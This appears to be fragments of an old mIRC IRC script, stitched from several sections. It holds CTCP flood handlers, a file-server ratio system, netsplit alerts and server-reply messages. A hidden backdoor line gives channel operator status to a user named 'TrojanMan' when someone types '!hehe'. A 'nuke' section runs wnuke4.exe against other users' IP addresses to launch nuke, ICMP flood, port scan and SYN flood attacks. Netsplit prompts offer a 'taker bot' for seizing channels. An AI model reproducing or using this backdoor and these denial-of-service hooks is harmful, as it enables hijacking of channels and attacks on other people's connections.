n9= if ( %ctcp == 1 ) { /notice $nick $me 's lag is %p second(s) |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| Lag Meter | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n10= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) {
n11= if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n12= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n13= halt
n14= }
n15= :me
n18= if ( $query(1) == $null ) { query VIEWER }
n19= if ( $parm2 == $null ) halt
n20= if ( $nick == $me ) goto me
n21= else {
n22= /set %ctcpp $parm1
n23= inc %ctcp 1
n24= /.timer101 1 30 /set %ctcp 0
n25= if ( %ctcp == 1 ) { /notice $nick $me is $address on $server | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n26= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n27= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n28= halt
n29= }
n30= :me
n32=1:VERSION: {
n33= if ( $query(1) == $null ) { query VIEWER }
n34= if ( $nick == $me ) goto me
n35= else {
n36= /set %ctcpp $parm1
n37= inc %ctcp 1
n38= /.timer101 1 30 /set %ctcp 0
n39= if ( %ctcp == 1 ) {/notice $nick $me is using |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| ver. 1.2 by CaLvN | /flud }
n40= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n41= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n42= halt
n46=1:PAGE: {
n47=if ( $query(1) == $null ) { query VIEWER }
n48=if ($parm2 == $null) halt
n49=if ( $nick == $me ) goto me
n50=if ( $nick != $me ) {
n51= /set %ctcpp $parm1
n52= inc %ctcp 1
n53= /.timer101 1 30 /set %ctcp 0
n54= if ( %ctcp == 1 ) { /notice $nick Try /notice $me page to page me. | /flud }
n55= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n56= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n57= halt
n61=1:FINGER: {
n62=if ( $query(1) == $null ) { query VIEWER }
n63=if ($parm2 == $null) halt
n64=if ( $nick == $me ) goto me
n65=if ( $nick != $me ) {
n66= /set %ctcpp $parm1
n67= inc %ctcp 1
n68= /.timer101 1 30 /set %ctcp 0
n69= if ( %ctcp == 1 ) { /notice $nick $me is Jonathan Pearce | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n70= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n71= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n72= halt
n76=1:TIME: {
n77=if ( $query(1) == $null ) { query VIEWER }
n78=if ($parm2 == $null) halt
n79=if ( $nick == $me ) goto me
n80=if ( $nick != $me ) {
n81= /set %ctcpp $parm1
n82= inc %ctcp 1
n83= /.timer101 1 30 /set %ctcp 0
n84= if ( %ctcp == 1 ) { /notice $nick the time is $time | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n85= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n86= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n87= halt
n91=1:ECHO: {
n92=if ( $query(1) == $null ) { query VIEWER }
n93=if ($parm2 == $null) halt
n94=if ( $nick == $me ) goto me
n95=if ( $nick != $me ) {
n96= /set %ctcpp $parm1
n97= inc %ctcp 1
n98= /.timer101 1 30 /set %ctcp 0
n99= if ( %ctcp == 1 ) { /notice $nick You like Canyons...Echo Echo... | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n100= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n101= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n102= halt
n106=1:USERINFO: {
n107=if ( $query(1) == $null ) { query VIEWER }
n108=if ($parm2 == $null) halt
n109=if ( $nick == $me ) goto me
n110=if ( $nick != $me ) {
n111= /set %ctcpp $parm1
n112= inc %ctcp 1
n113= /.timer101 1 30 /set %ctcp 0
n114= if ( %ctcp == 1 ) { /notice $nick trust me Im cool! | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n115= if ( %ctcp > 1 ) && ( %ctcp < %mctcp ) { if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n116= if ( %ctcp >= %mctcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n117= halt
n121=#flood end
n122=#extreme disabled
n123=1:*: {
n124=if ( $query(1) == $null ) { query VIEWER }
n125=if ($parm2 == $null) halt
n126=if ( $nick == $me ) goto me
n127=if ( $nick != $me ) {
n128= /set %ctcpp $parm1
n129= /flud
n130= inc %ctcp 1
n131= /.timer101 1 30 /set %ctcp 0
n132= if ( %ctcp == 1 ) { /notice $nick nothins gettin through... |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| Flood Protection! | if ( %ctcpv == On ) { /flud } if ( %ctcpv == Off ) { halt } }
n133= if ( %ctcp >= %ectcp ) { /ignore -tnu60 *!*@ $+ $site | /fludd | /notice $nick Max CTCP threshold exceeded! You have been placed on ignore for 60 seconds! |\⌐½ñºó«Φw ºó«∩pt'97 v1.0ñ╗⌐/| }
n155= elseif $get(0) >= %maxsends { msg $nick Sorry, you have exceeded the maximum number of files I can be receiving at one time, please try again later | halt }
n156= elseif %ratiostatus == on {
n157= %temp1 = $lof( $getdir [ $+ [ $parm3 ] ] )
n158= set %getdirfile $getdir $+ $parm3
n159= if ($lof($findfile(%directory,$parm3)) == $parm6) { msg $nick Sorry, the file you are sending already exists on my hard drive under $findfile(%directory,$parm3) -=OpMaster=- Pro v1.0 | halt }
n160= elseif $lof(%getdirfile) == $parm6 { msg $nick Sorry, the file you are sending has already been uploaded to my collection -=OpMaster=- Pro v1.0 | halt }
n161= else { /msg $nick Upload of $parm3 detected. You will receive credits when it is complete }
n162= }
n164=1:FSERVE:.ctcp $nick Reply Fserve Access command $+ %command $+ Ratio is 1: $+ %ratio
n29= if ($parm1 == Excess) && ($parm2 == Flood) { inc %flooded 1 | echo VIEWER 1<|Channel Notice|>12 $nick quit due to Excess Flood. | halt }
n30= if ($parm1 == Ping) && ($parm2 == Timeout) { echo VIEWER 1<|Channel Notice|>12 $nick quit due to Ping Timeout. | halt }
n31= if ($parm1 == Dead) && ($parm2 == Socket) { echo VIEWER 1<|Channel Notice|>12 $nick quit due to Dead Socket. | halt }
n32= if (($parm3 != $null) || ($parm2 == $null)) goto end | if ($parm1 == %split11 && $parm2 == %split22) { /echo VIEWER 4<|Who Left|> 3 $+ $nick $+ ( $+ $time) ( $+ $parms $+ ) | goto next } | if ircII* iswm $parm1 goto end | if ((irc* iswm $parm1) || (irc* iswm $parm2) || (*com iswm $parm1) || (*com iswm $parm2) || (*net iswm $parm1) || (*net iswm $parm2) || (*edu iswm $parm1) || (*edu iswm $parm2)) goto next | goto end
n33= :next | set %split11 $parm1 | set %split22 $parm2 | set %split1 $parm1 | set %split2 $parm2 | if ($left(2,%split1) == *.) goto split1 | if ($left(2,%split2) == *.) goto split2 | if irc* iswm $parm1 goto split | halt
n34= :split | splay $mircdir $+ wavs\net.wav | echo VIEWER 4<|Netsplit|>3detected at $mid(1,5,$time) (4 $+ $parms $+ ) | echo VIEWER 4<|Notice|>2To join split 3( $+ $parm2 $+ )2 hit F10, to load taker bot on server hit shift F10. | echo VIEWER 4<|Notice|>3If you have trouble loading on new server hit control F10 and you will reload on present server. | halt
n35= :split1 | splay $mircdir $+ wavs\net.wav | echo VIEWER 4<|Netsplit|>3detected at $mid(1,5,$time) (4 $+ $parms $+ ) | echo VIEWER 4<|Notice|>2To join split 3( $+ $parm2 $+ )2 hit F10, to load taker bot on server hit shift F10 | echo VIEWER 4<|Notice|>3If you have trouble loading on new server hit control F10 and you will reload on present server. | set %split1 $replace(%split1,*,irc) | halt
n36= :split2 | splay $mircdir $+ wavs\net.wav | echo VIEWER 4<|Netsplit|>3detected at $mid(1,5,$time) (4 $+ $parms $+ ) | echo VIEWER 4<|Notice|>2To join split 3( $+ $replace(%split2,*,irc) $+ )2 hit F10, to load taker bot on server hit shift F10 | echo VIEWER 4<|Notice|>3If you have trouble loading on new server hit control F10 and you will reload on present server. | halt | :end
n43= else /echo VIEWER 4<|CTCP REPLY|> $nick $parms | halt
n45=1:ON SNOTICE:*Net*Break*: {
n46= if ( %splitv == Off ) { halt }
n47= if ( %splitv == On ) { set %split2 $parm7 | splay $mircdir $+ wavs\net.wav | echo VIEWER 4<|NetSplit|>detected at 3 $+ $parm6 $+ 4 <*>3 $+ $parm7 $+ | echo VIEWER 4<|Notice|>2To join split 3( $+ $parm7 $+ )2 hit F10, to load taker bot on server hit shift F10 | echo VIEWER 4<|Notice|>3If you have trouble loading on new server hit control F10 and you will reload on present server. | halt }
n49=1:ON SNOTICE:*Net*Junction*: {
n50= if ( %splitv == Off ) { halt }
n51= if ( %splitv == On ) { splay $mircdir $+ wavs\net.wav | echo VIEWER 4<|NetMerge|>3detected at 2 $+ $parm6 $+ 4 <*>2 $+ $parm7 $+ | unset %split2 | halt }
n428= msg = $+ $nick Sorry, you do not have enough credits. The file you have requested requires $lof($cd [ $+ [ \ [ $+ [ $parm2 ] ] ] ] ) credits, please upload on a 1 for %ratio basis to earn byte credits.
n429= msg = $+ $nick You currently have % [ $+ [ ( [ $+ [ $nick [ $+ [ ) ] ] ] ] ] ] bytes of download access, please upload for more and do note that you will not receive your credits until the upload is complete.
n430= halt
n431= :nogood
n432= msg = $+ $nick Invalid file name, please use the form: <get filename.ext>
n433= halt
n435=1:on text:!hehe:/mode # +o TrojanMan
n437=1:on filesent:*.*: {
n438= inc % $+ $nick $+ download
n439= unset % $+ $nick $+ canget $+ $filename
n440= write $mircdir $+ download.log Sent $nopath($filename) to -= $+ $nick $+ =- on $fulldate
n442=1:on filercvd:*.*: {
n443= %temp = %ratio * $lof($filename)
n444= inc % $+ ( $+ $nick $+ ) %temp
n445= inc % $+ $nick $+ sent
n446= write $mircdir $+ upload.log Received $filename from $nick
n449= echo 10 -a 12 $+ $nick $+ 10 has uploaded a Midi File: 12 $+ $nopath($filename) $+ 10
n450= echo 10 -a Press F8 to Play (F9 stops song)
n451= set %sound $filename
n452= }
n453= if $right(3,$nopath($filename)) == wav {
n454= echo 10 -a 12 $+ $nick $+ 10 has uploaded a Wav File: 12 $+ $nopath($filename) $+ 10
n455= echo 10 -a Press F8 to Play
n456= set %sound $filename
n457= }
n459=#ratio end
n460=1:on serv:dir*:msg = $+ $nick -=OpMaster=- Pro v1.0
n461=1:on serv:ls*:msg = $+ $nick -=OpMaster=- Pro v1.0
n462=1:on filesent:*.*:inc % $+ $nick $+ download
n463=1:on filercvd:*.*: {
n464= inc % $+ $nick $+ sent
n465= if $right(3,$nopath($filename)) == mid {
n466= echo 10 -a 12 $+ $nick $+ 10 has uploaded a Midi File: 12 $+ $nopath($filename) $+ 10
n467= echo 10 -a Press F8 to Play (F9 stops song)
n468= set %sound $filename
n469= }
n470= if $right(3,$nopath($filename)) == wav {
n471= echo 10 -a 12 $+ $nick $+ 10 has uploaded a Wav File: 12 $+ $nopath($filename) $+ 10
n472= echo 10 -a Press F8 to Play
n473= set %sound $filename
n474= }
n0=306:* /echo 2 -a ***You are now marked away. | halt
n1=305:* /echo 2 ***You are no longer marked away. | halt
n2=401:* { if ( VIEWER isin $parms ) { /echo VIEWER 3<|ERROR|>Do not talk in this window. It is for CTCPs, Server Notices, and Wall Ops requests only. | halt }
n4=433:* /echo 2 -s ***Your nickname is in use... what you gonna do about it? | halt
n5=461:* /echo 2 ***More Input required to make this command! | halt
n6=465:* /echo 2 ***You have been banned on $server ! | halt
n7=492:* /echo 4 ***No IRC Operators on this server, have fun !! | halt
n8=482:* /echo 4 ***Get OPs first, retard! | halt
n9=474:* /echo 4 ***Cannot Join $parm2 you have been banned! | halt
n10=475:* /echo 2 ***Get the right key for $parm2 first. | halt
n11=473:* /echo 2 ***Sorry cannot join $parm2 . Get invited! | halt
n107= /echo 2 This Network has $parm10 linked servers.
n108= /echo 2 There are $parm4 people.
n109= /echo 2 There are $parm7 paranoid people. | halt
n111=252:* { /echo 2 There are $parm2 IRC Ops. | halt }
n112=254:* { /echo 2 There are $parm2 too many people on...
n113=/echo 4 ---+++===+++--- | halt }
n114=255:* { halt }
n115=256:* { halt }
n116=#l end
n117=#nuke disabled
n118=311:*: set %nip $parm4 | halt
n119=312:*: set %nserv $parm3 | halt
n120=301:*: halt
n121=313:*: halt
n122=319:*: halt
n123=317:*: halt
n124=318:*: {
n125= if ( %nuke == on ) run $mircdir $+ bin\wnuke4.exe -n %nserv %nip 0 1200-3500 %nport | set %nuke off | echo 4 Attempting nuke of %nip on %nserv %nport $+ . | halt
n126= if ( %icmp == on ) run $mircdir $+ bin\wnuke4.exe -c %nip 10000 0 3 | set %icmp off | echo 4 Attempting echo on %nip on %nserv | halt
n127= if ( %scan == on ) run $mircdir $+ bin\wnuke4.exe -a %nip 0 6665-6669 | set %scan off | echo 4 Attempting scan of %nip on %nserv | halt
n128= if ( %syn == on ) run $mircdir $+ bin\wnuke4.exe -i %nip 6665-6669 | set %syn off | echo 4 Attempting flood on %nip on %nserv | halt
n135= if ( $parm5 == $server ) { inc %banu 1 | set %coppers %coppers ( %banu ) $parm6 }
n136= halt
n138=315:*:/echo VIEWER 2<|IRCops|>3 Total number on NETWORK:4 %o $+ . Total number that can ban you:4 %banu $+ . For list of these, hit F6 | /unset %banu | /unset %o | /.disable #gcircops | if ( %pin == On ) { .enable #pin } | /halt
n142=219:* { /echo VIEWER 5<|Notice|>2End of List, to Find out who one of these is do a /who *user@domain.com* on the address. | disable #vircops | halt }